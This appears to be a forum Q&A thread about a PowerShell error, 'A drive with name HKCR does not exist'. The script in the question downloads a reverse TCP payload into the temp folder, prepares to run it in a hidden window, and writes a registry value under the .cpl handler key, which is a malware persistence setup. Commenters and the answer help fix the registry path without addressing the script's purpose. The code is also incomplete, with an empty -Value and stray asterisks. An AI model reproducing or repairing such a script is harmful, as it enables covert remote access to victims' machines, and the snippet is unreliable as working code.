# Creating HKCR registry key using powershell script

Tags: windows, powershell

```
$PERprogram = $env:tmp+"\rev_tcp.exe" # Downloding the payload reverse tcp in temp folder
$dest = $env:tmp+"\rev_tcp"
$cmd = "powershell -WindowStyle Hidden " + $PERprogram
DownloadPayload 'rev_tcp' $dest -ErrorAction Continue;

Set-ItemProperty "HKCR:\.cpl\persistentHandler" -Name "sd" -Value  -Force**
```

when i try to run the above script. I am getting the error as A drive with name HKCR does not exit. but i already created the drive with HKCR in powershell as  New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR.

Comment: `New-PSDrive -PSProvider Registry` won't persist across powershell sessions - you need to run `New-PSDrive` again at the top of your script, or target `Registry::HKEY_CLASSES_ROOT\.cpl\persistentHandler` instead

Comment: I have included New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR in the script as starting line but i am getting no such drive as error.

Answer (score 2):

You can use HKLM:\SOFTWARE\Classes instead of creating HKCR:.

Comment: Both HKCR and HKLM are same.